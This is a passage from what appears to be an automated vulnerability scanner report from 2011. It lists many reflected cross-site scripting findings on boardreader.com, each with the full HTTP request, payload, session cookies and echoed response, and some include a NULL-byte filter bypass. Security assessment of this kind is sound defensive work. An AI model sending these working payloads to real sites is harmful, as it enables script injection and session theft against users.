var ACTIVE_GRAPH_GROUP = 'day'; var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=nolanfans.com&9419e'-alert(1)-'6dbeba69c1=1&p=30&d=1288940004&b=0&g=&x=1'; var selectedLinkGraph = 'graph3Months';
if (selectedLinkGraph == 'graphDay' ) selectedLinkGraph = 'g ...[SNIP]...
1.93. http://boardreader.com/domain/ratedesi.com [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boardreader.com
Path:
/domain/ratedesi.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffe4a"><script>alert(1)</script>5a4d6909fb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /domain/ratedesi.com?ffe4a"><script>alert(1)</script>5a4d6909fb2=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 06:53:30 GMT Server: Apache Expires: Thu, 03 Feb 2011 12:53:31 +0000 Cache-Control: no-store, max-age=21600 Pragma: Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <a class="fp_adv" href="/a/ratedesi.com?ffe4a"><script>alert(1)</script>5a4d6909fb2=1"> ...[SNIP]...
1.94. http://boardreader.com/domain/ratedesi.com [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boardreader.com
Path:
/domain/ratedesi.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8f15'-alert(1)-'e30e737b55a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /domain/ratedesi.com?d8f15'-alert(1)-'e30e737b55a=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 06:54:06 GMT Server: Apache Expires: Thu, 03 Feb 2011 12:54:08 +0000 Cache-Control: no-store, max-age=21600 Pragma: Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <script>
var ACTIVE_GRAPH_GROUP = 'day'; var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=ratedesi.com&d8f15'-alert(1)-'e30e737b55a=1&p=30&d=1288940048&b=0&g=&x=1'; var selectedLinkGraph = 'graph3Months';
if (selectedLinkGraph == 'graphDay' ) selectedLinkGraph = 'g ...[SNIP]...
1.95. http://boardreader.com/domain/sherdog.net [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boardreader.com
Path:
/domain/sherdog.net
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9c1b"><script>alert(1)</script>c6dc46feb64 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /domain/sherdog.net?d9c1b"><script>alert(1)</script>c6dc46feb64=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 06:53:15 GMT Server: Apache Expires: Thu, 03 Feb 2011 12:53:17 +0000 Cache-Control: no-store, max-age=21600 Pragma: Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <a class="fp_adv" href="/a/sherdog.net?d9c1b"><script>alert(1)</script>c6dc46feb64=1"> ...[SNIP]...
1.96. http://boardreader.com/domain/sherdog.net [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boardreader.com
Path:
/domain/sherdog.net
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3fd25'-alert(1)-'46ee574fc5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /domain/sherdog.net?3fd25'-alert(1)-'46ee574fc5=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 06:53:27 GMT Server: Apache Expires: Thu, 03 Feb 2011 12:53:29 +0000 Cache-Control: no-store, max-age=21600 Pragma: Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <script>
var ACTIVE_GRAPH_GROUP = 'day'; var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=sherdog.net&3fd25'-alert(1)-'46ee574fc5=1&p=30&d=1288940009&b=0&g=&x=1'; var selectedLinkGraph = 'graph3Months';
if (selectedLinkGraph == 'graphDay' ) selectedLinkGraph = 'g ...[SNIP]...
1.97. http://boardreader.com/domain/ufc.com [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boardreader.com
Path:
/domain/ufc.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3b68"><script>alert(1)</script>31e4bcbef97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /domain/ufc.com?f3b68"><script>alert(1)</script>31e4bcbef97=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 06:52:45 GMT Server: Apache Expires: Thu, 03 Feb 2011 12:52:46 +0000 Cache-Control: no-store, max-age=21600 Pragma: Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <a class="fp_adv" href="/a/ufc.com?f3b68"><script>alert(1)</script>31e4bcbef97=1"> ...[SNIP]...
1.98. http://boardreader.com/domain/ufc.com [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boardreader.com
Path:
/domain/ufc.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2be3e'-alert(1)-'8c796450d60 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /domain/ufc.com?2be3e'-alert(1)-'8c796450d60=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 06:53:13 GMT Server: Apache Expires: Thu, 03 Feb 2011 12:53:15 +0000 Cache-Control: no-store, max-age=21600 Pragma: Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <script>
var ACTIVE_GRAPH_GROUP = 'day'; var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=ufc.com&2be3e'-alert(1)-'8c796450d60=1&p=30&d=1288939995&b=0&g=&x=1'; var selectedLinkGraph = 'graph3Months';
if (selectedLinkGraph == 'graphDay' ) selectedLinkGraph = 'g ...[SNIP]...
1.99. http://boardreader.com/domain/websitetoolbox.com [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boardreader.com
Path:
/domain/websitetoolbox.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f166'-alert(1)-'182d880e185 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /domain/websitetoolbox.com?3f166'-alert(1)-'182d880e185=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 06:53:17 GMT Server: Apache Expires: Thu, 03 Feb 2011 12:53:31 +0000 Cache-Control: no-store, max-age=21600 Pragma: Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <script>
var ACTIVE_GRAPH_GROUP = 'day'; var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=websitetoolbox.com&3f166'-alert(1)-'182d880e185=1&p=30&d=1288940011&b=0&g=&x=1'; var selectedLinkGraph = 'graph3Months';
if (selectedLinkGraph == 'graphDay' ) selectedLinkGraph = 'g ...[SNIP]...
1.100. http://boardreader.com/domain/websitetoolbox.com [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boardreader.com
Path:
/domain/websitetoolbox.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a2db"><script>alert(1)</script>3a4a3e5c070 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /domain/websitetoolbox.com?9a2db"><script>alert(1)</script>3a4a3e5c070=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 06:52:32 GMT Server: Apache Expires: Thu, 03 Feb 2011 12:52:34 +0000 Cache-Control: no-store, max-age=21600 Pragma: Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <a class="fp_adv" href="/a/websitetoolbox.com?9a2db"><script>alert(1)</script>3a4a3e5c070=1"> ...[SNIP]...
1.101. http://boardreader.com/domain/worldmastiffforum.com [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boardreader.com
Path:
/domain/worldmastiffforum.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c581"><script>alert(1)</script>99d3eb93754 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /domain/worldmastiffforum.com?2c581"><script>alert(1)</script>99d3eb93754=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 06:52:21 GMT Server: Apache Expires: Thu, 03 Feb 2011 12:52:30 +0000 Cache-Control: no-store, max-age=21600 Pragma: Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <a class="fp_adv" href="/a/worldmastiffforum.com?2c581"><script>alert(1)</script>99d3eb93754=1"> ...[SNIP]...
1.102. http://boardreader.com/domain/worldmastiffforum.com [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boardreader.com
Path:
/domain/worldmastiffforum.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bbef'-alert(1)-'5ee0da9ec64 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /domain/worldmastiffforum.com?4bbef'-alert(1)-'5ee0da9ec64=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 06:52:45 GMT Server: Apache Expires: Thu, 03 Feb 2011 12:52:50 +0000 Cache-Control: no-store, max-age=21600 Pragma: Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <script>
var ACTIVE_GRAPH_GROUP = 'day'; var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=worldmastiffforum.com&4bbef'-alert(1)-'5ee0da9ec64=1&p=30&d=1288939970&b=0&g=&x=1'; var selectedLinkGraph = 'graph3Months';
if (selectedLinkGraph == 'graphDay' ) selectedLinkGraph = 'g ...[SNIP]...
The value of the ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %004177f"><script>alert(1)</script>0da953a680a was submitted in the ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d parameter. This input was echoed as 4177f"><script>alert(1)</script>0da953a680a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /index.php?a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1%004177f"><script>alert(1)</script>0da953a680a&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1<ype=ext HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 07:27:18 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>s0.2md ...[SNIP]... <A onclick="" href="./index.php?o=10&a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1%004177f"><script>alert(1)</script>0da953a680a&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1<ype=ext"> ...[SNIP]...
The value of the extended_search request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 484f3"><script>alert(1)</script>8c7809fc22a was submitted in the extended_search parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1484f3"><script>alert(1)</script>8c7809fc22a<ype=ext HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 07:28:57 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>s0.2md ...[SNIP]... lick="" href="./index.php?o=10&a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1484f3"><script>alert(1)</script>8c7809fc22a<ype=ext"> ...[SNIP]...
The value of the ltype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b85f1"><script>alert(1)</script>8330a287d66 was submitted in the ltype parameter. This input was echoed as b85f1"><script>alert(1)</script>8330a287d66 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /index.php?a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1<ype=ext%00b85f1"><script>alert(1)</script>8330a287d66 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 07:30:39 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>s0.2md ...[SNIP]... "./index.php?o=10&a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1<ype=ext%00b85f1"><script>alert(1)</script>8330a287d66"> ...[SNIP]...
1.106. http://boardreader.com/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boardreader.com
Path:
/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87160"><script>alert(1)</script>04f67b98015 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1<ype=ext&87160"><script>alert(1)</script>04f67b98015=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 07:31:43 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>s0.2md ...[SNIP]... f="./index.php?o=10&a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1<ype=ext&87160"><script>alert(1)</script>04f67b98015=1"> ...[SNIP]...
The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6bb6"><script>alert(1)</script>60f59291b18 was submitted in the q parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gife6bb6"><script>alert(1)</script>60f59291b18&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1<ype=ext HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 07:21:19 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>s0.2md ...[SNIP]... <link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://boardreader.com//linkrss/s0.2mdn.net/viewad/817-grey.gife6bb6"><script>alert(1)</script>60f59291b18?p=10&format=RSS2.0" /> ...[SNIP]...
The value of the q2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002cc1b"><script>alert(1)</script>44dd33ad4cf was submitted in the q2 parameter. This input was echoed as 2cc1b"><script>alert(1)</script>44dd33ad4cf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
